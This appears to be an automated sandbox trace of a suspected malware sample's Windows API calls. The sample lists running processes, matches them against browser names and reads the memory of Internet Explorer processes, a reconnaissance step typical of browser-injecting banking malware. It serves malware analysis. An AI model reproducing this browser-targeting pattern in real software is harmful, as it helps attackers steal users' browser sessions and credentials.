	[0242.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.694] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0242.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.694] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8a24
	[0242.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.695] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.696] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.696] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.697] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8a28
	[0242.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.698] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0242.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.698] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.698] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0242.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.699] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0242.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8a2c
	[0242.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.700] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0242.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.700] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.701] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0242.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.701] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0242.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8a30
	[0242.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.702] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0242.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.702] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.703] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0242.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.703] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0242.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8a34
	[0242.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.704] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0242.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.704] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.705] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0242.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.705] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0242.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0242.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0242.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8a38
	[0242.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.707] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0242.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.708] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.708] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0242.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.709] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.709] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0242.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8a3c
	[0242.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.710] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0242.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.711] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.711] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0242.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.711] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.712] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0242.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8a40
	[0242.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.712] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0242.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.713] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.713] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0242.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.714] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0242.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8a44
	[0242.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.715] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0242.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.715] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.716] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0242.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.716] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.716] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0242.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8a48
	[0242.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.717] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0242.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.718] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.718] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0242.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.719] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.719] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0242.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8a4c
	[0242.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.720] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0242.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.720] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.721] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0242.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.721] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0242.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8a50
	[0242.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.722] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0242.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.723] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.723] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0242.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.723] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.724] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0242.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8a54
	[0242.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.725] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0242.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.725] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.726] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0242.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.726] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.726] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0242.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8a58
	[0242.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.727] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0242.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.728] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.728] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0242.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.728] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.728] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0242.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8a5c
	[0242.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.730] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0242.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.730] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.730] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0242.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.731] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.731] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0242.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8a60
	[0242.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.732] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0242.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.732] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.733] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0242.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.733] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.734] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0242.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8a64
	[0242.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.734] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0242.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.735] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.736] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0242.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.736] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.737] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0242.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8a68
	[0242.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.738] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0242.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.738] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.739] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0242.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.740] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.740] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0242.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8a6c
	[0242.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.741] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0242.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.742] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.742] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0242.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.743] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0242.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8a70
	[0242.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.744] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0242.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.745] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.745] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0242.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.746] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0242.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8a74
	[0242.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.747] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0242.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.747] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0242.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.748] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0242.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.748] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.748] NtQueryInformationProcess (in: ProcessHandle=0x8a74, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0242.748] ReadProcessMemory (in: hProcess=0x8a74, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0242.749] ReadProcessMemory (in: hProcess=0x8a74, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0242.749] ReadProcessMemory (in: hProcess=0x8a74, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0242.749] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0242.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0242.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8a78
	[0242.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.750] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0242.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.750] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0242.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.750] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0242.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.751] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.751] NtQueryInformationProcess (in: ProcessHandle=0x8a78, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0242.751] ReadProcessMemory (in: hProcess=0x8a78, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0242.751] ReadProcessMemory (in: hProcess=0x8a78, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0242.751] ReadProcessMemory (in: hProcess=0x8a78, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
